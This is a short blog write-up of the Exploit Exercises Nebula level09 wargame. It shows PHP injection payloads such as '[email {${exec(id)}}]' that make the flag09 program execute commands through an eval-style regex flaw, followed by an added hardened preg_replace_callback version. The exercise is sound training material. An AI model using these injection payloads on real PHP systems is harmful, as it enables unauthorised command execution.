Thursday, June 30, 2016

Exploit Exercises - nebula level09

flag09 reads the file supplied as arg1. We also need to supply a second arg, but it is not used. If we do not supply arg2, an error is thrown but the file specified by arg1 is still read.


After trial & error, I found the correct syntax that flag09 accepts:
    [email $phpinfo()]

This makes flag09 treat phpinfo() as a valid variable, but it throws an error.



Success - 0.1 - found the correct syntax to get phpinfo() executed:
    [email {${phpinfo()}}]



Success - using PHP’s exec() function to execute getflag/id:
    [email {${exec(id)}}]
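
An added example, not code from the original post or from Exploit Exercises: a hardened version of the kind of [email ...] rewriting that flag09 performs. It assumes the flaw is a regex replacement that is evaluated as PHP code (the /e modifier of preg_replace, removed in PHP 7), which the post does not show; spam() and markup_safe() are hypothetical names.

```php
<?php
// Added example (assumed design, hypothetical function names).

// Obfuscate an address for display. The input is handled strictly as data.
function spam(string $email): string
{
    $email = str_replace('.', ' dot ', $email);
    return str_replace('@', ' AT ', $email);
}

// Rewrite [email ...] tags without ever evaluating the captured text.
function markup_safe(string $contents): string
{
    // With the /e modifier the replacement was built as a double-quoted PHP
    // string and eval'd, so {${...}} inside the capture was parsed as code.
    // A callback receives the capture as an ordinary string instead, and
    // nothing in it is interpreted.
    $result = preg_replace_callback(
        '/\[email ([^\]]*)\]/',
        function (array $m): string {
            return spam($m[1]);
        },
        $contents
    );
    if ($result === null) {
        // Fail closed on a regex engine error rather than emit partial output.
        throw new RuntimeException('regex error code ' . preg_last_error());
    }
    return $result;
}

// Constructed sample input: one benign tag and the test string from the post.
// Single quotes keep PHP from interpolating anything in the literals.
$sample = '[email alice@example.com]' . "\n"
        . '[email {${phpinfo()}}]' . "\n";

echo markup_safe($sample);
```

Run against the sample, the first tag is obfuscated and the second comes out as inert text with phpinfo() never called.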



Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.